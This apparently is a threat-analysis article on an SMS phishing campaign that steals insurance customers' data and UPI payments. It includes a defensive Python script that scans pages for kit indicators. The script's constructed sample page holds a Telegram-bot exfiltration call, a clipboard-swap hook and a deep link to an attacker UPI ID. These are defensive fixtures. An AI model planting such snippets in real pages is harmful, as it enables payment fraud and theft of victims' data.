
The attack converts trusted brand interactions into direct financial loss, exposing a critical vulnerability in the insurance sector’s digital payment ecosystem. It underscores the need for stronger anti‑phishing controls and rapid takedown mechanisms for free‑hosting abuse.
The rise of mobile‑first phishing exploits reflects a broader shift in cybercrime, where attackers capitalize on the ubiquity of SMS and instant messaging. By deploying counterfeit payment portals on free hosting services, threat actors bypass traditional security vetting and reach victims within seconds of message receipt. This low‑cost infrastructure, combined with real‑time Telegram bot exfiltration, creates a rapid feedback loop that amplifies fraud success rates, especially in markets where UPI payments dominate daily transactions.
Technically, the campaign chains several tactics: unvalidated form fields capture personal and policy data, which is immediately posted to Telegram bots through bot tokens hard‑coded in the page's JavaScript. The same JavaScript then renders a UPI URI as a QR code, deliberately omitting the amount parameter so the victim must type a value by hand, while clipboard‑abuse scripts silently replace copied text with attacker‑controlled UPI IDs. Deep‑link redirects then push users into legitimate payment apps, completing the fraudulent transfer without raising suspicion. The second‑stage template adds a credential‑harvesting layer, prompting victims for bank details under the guise of policy updates, thereby expanding the attack from payment fraud to full‑scale financial credential theft.
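The indicators in that chain (a hard‑coded Telegram bot token in the exfiltration call, a `upi://pay` URI without an `am` amount parameter, a clipboard handler, and a payment‑app deep link) are all static strings in the kit's HTML, which makes them easy to triage at takedown or abuse‑desk time. The following Python script is an added example, not code from the article or from the campaign itself: it scans a page for those indicators and reports them without echoing the full token. The regexes, the deep‑link scheme list and the sample page are assumptions constructed for illustration, not artifacts recovered from the kit.

```python
"""Static triage of a suspected UPI phishing-kit page (added example).

Looks for the indicators discussed above: Telegram bot-token exfiltration,
UPI payment URIs that omit the amount, clipboard-replacement handlers and
payment-app deep links. Intended for abuse-desk / takedown triage.
"""
import re
from urllib.parse import urlparse, parse_qs

# Telegram bot tokens are "<8-10 digits>:<35 url-safe chars>"; we only ever
# report the numeric bot id, never the secret half.
TELEGRAM_TOKEN_RE = re.compile(r"api\.telegram\.org/bot(\d{8,10}:[A-Za-z0-9_-]{35})")
UPI_URI_RE = re.compile(r"""upi://pay\?[^\s'"<>]+""")
CLIPBOARD_RE = re.compile(
    r"navigator\.clipboard\.writeText|addEventListener\(\s*['\"]copy['\"]|clipboardData\.setData"
)
# Assumed list of payment-app URI schemes a kit might deep-link into.
DEEPLINK_RE = re.compile(r"\b(tez|phonepe|paytmmp)://", re.I)


def analyse_upi_uri(uri):
    """Parse a upi://pay URI and say whether it pins an amount (am=)."""
    params = parse_qs(urlparse(uri).query)
    return {
        "pa": params.get("pa", [None])[0],           # payee VPA
        "pn": params.get("pn", [None])[0],           # payee display name
        "amount_present": bool(params.get("am", [""])[0]),
    }


def scan_page(html, known_payee_vpas=frozenset()):
    """Return a list of (indicator, detail) tuples found in the page source."""
    findings = []
    for m in TELEGRAM_TOKEN_RE.finditer(html):
        bot_id = m.group(1).split(":", 1)[0]        # redact the secret part
        findings.append(("telegram_exfil", bot_id))
    for m in UPI_URI_RE.finditer(html):
        info = analyse_upi_uri(m.group(0))
        if not info["amount_present"]:
            findings.append(("upi_missing_amount", info["pa"]))
        if known_payee_vpas and info["pa"] not in known_payee_vpas:
            findings.append(("upi_unknown_payee", info["pa"]))
    if CLIPBOARD_RE.search(html):
        findings.append(("clipboard_tamper", None))
    for m in DEEPLINK_RE.finditer(html):
        findings.append(("deeplink_redirect", m.group(1).lower()))
    return findings


# Constructed sample page, not recovered from the real kit. The token is a
# placeholder of the right shape; the VPAs are placeholders.
CONSTRUCTED_TOKEN = "123456789:" + "A" * 35
SAMPLE_PAGE = f"""
<form id="renew"><input name="policy"><input name="phone"></form>
<script>
  fetch("https://api.telegram.org/bot{CONSTRUCTED_TOKEN}/sendMessage");
  var upi = "upi://pay?pa=payments@examplebank&pn=Premium%20Renewal&cu=INR";
  document.addEventListener('copy', swapVpa);
  location.href = "phonepe://pay?pa=attacker@upi";
</script>
"""

if __name__ == "__main__":
    for kind, detail in scan_page(SAMPLE_PAGE, {"payments@examplebank"}):
        print(f"{kind:20s} {detail}")
```

Running the block against the constructed page reports the bot id, the amount‑less UPI URI with its payee VPA, the clipboard handler and the `phonepe` deep link; passing the insurer's real VPAs as `known_payee_vpas` additionally flags any payee that is not the legitimate collection account.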
For insurers and financial institutions, the incident highlights urgent gaps in customer education, channel monitoring, and third‑party hosting oversight. Implementing robust SMS filtering, enforcing multi‑factor authentication for policy changes, and collaborating with hosting providers to block malicious subdomains are essential defenses. Moreover, regulators must consider mandating rapid takedown protocols for phishing kits that exploit free platforms, while law enforcement should prioritize tracking Telegram bot activity to disrupt the exfiltration pipeline. Proactive measures can mitigate both direct monetary loss and reputational damage in an increasingly digitized insurance landscape.